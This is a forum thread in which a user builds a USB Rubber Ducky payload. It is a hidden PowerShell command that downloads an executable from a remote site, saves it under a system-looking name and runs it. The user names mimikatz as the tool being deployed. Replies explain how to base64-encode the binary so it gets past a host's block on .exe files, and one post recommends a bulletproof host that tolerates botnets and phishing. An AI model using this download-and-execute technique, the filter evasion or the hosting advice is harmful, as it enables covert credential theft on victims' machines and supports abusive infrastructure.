Finianb1 Posted May 9, 2018 Share Posted May 9, 2018 Hi everyone, I'm trying to make a powershell wget and execute payload for the ducky but 000webhosting, my usual go-to webhost, doesn't allow .exe files. I was wondering if there was another hosting site that is free and does allow exes, or if there is some way I can encode the payload or something similar to get around such a block. I thought you might be able to encode it using base 64 in a text file, but I don't know how I'd make the powershell convert it from plaintext to binary using base64. I was thinking something like this. Any help is appreciated. Here is my script so far: $source = "mysite.com/executables/system32.exe"; $destination = "C:\Windows\system32helper.exe"; Invoke-WebRequest $source -OutFile $destination; start-process system32.exe That gets entered into a hidden powershell window. Thank you for your time. Quote Link to comment Share on other sites More sharing options...
Finianb1 Posted May 9, 2018 Author Share Posted May 9, 2018 I'm trying to convert mimikatz if that helps. Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted May 10, 2018 Share Posted May 10, 2018 Welp, you can always get a vps and host it. Or better yet, instead of everyone looking for hosting for exe files, why not base64 encode it and store it as a txt file. Download that string, convert back to bytes and then write to drive or memory and execute. Quote Link to comment Share on other sites More sharing options...
Finianb1 Posted May 10, 2018 Author Share Posted May 10, 2018 That's what I wanted to figure out, was how to do such a base64 encoding and decoding in PowerShell. Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted May 21, 2018 Share Posted May 21, 2018 On 5/9/2018 at 6:34 PM, Finianb1 said: That's what I wanted to figure out, was how to do such a base64 encoding and decoding in PowerShell. Instead of just giving the answer, the answer is the second answer here for handing binary files. I tried to find a page to discuss it but everyone seems to be encoding text more than binary out there. https://stackoverflow.com/questions/42592518/encode-decode-exe-into-base64 The premise is this. You use the "[System.IO.File]::ReadAllBytes(<full path to binary>)" method from .net to read all bytes of the binary which will make a byte array and then use [convert]::ToBase64String() to convert that to base64 and save that string to a text file to host. You Posh script should download that contents of that text file and decode it from base64 and then you can write back out the bytes to the disk to run from disk as the original file or do whatever else you were going to do with it. If the file was text like a script you would user [System.IO.File]::ReadAllText(<full path to text file>) and then use "[System.Text.Encoding]::ASCII.GetBytes(<string object>)" to convert to bytes to encode in base64. If you plan on using the .NET functions do not take relative paths to files as parameters so you will have to use the full path to the file when reading them in. "$(Resolve-Path -Path <relative path to file>).path" can be used to convert relative path to full path before passing to the .net functions. Quote Link to comment Share on other sites More sharing options...
natalie24 Posted February 28, 2019 Share Posted February 28, 2019 Or, you could just save yourself from the trouble and go with a paid BP hoster that won't ban you on spot. First, always read AUP. Most times, you'll see a looong list of what's not allowed there, incl. botnet, phishing, spam, etc. BUT, my great personal experience with my own hush-hush stuff was Zamanto, one of the very few real hosting providers that does not cares about what u host. Read their Tos, you will laugh like I did. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.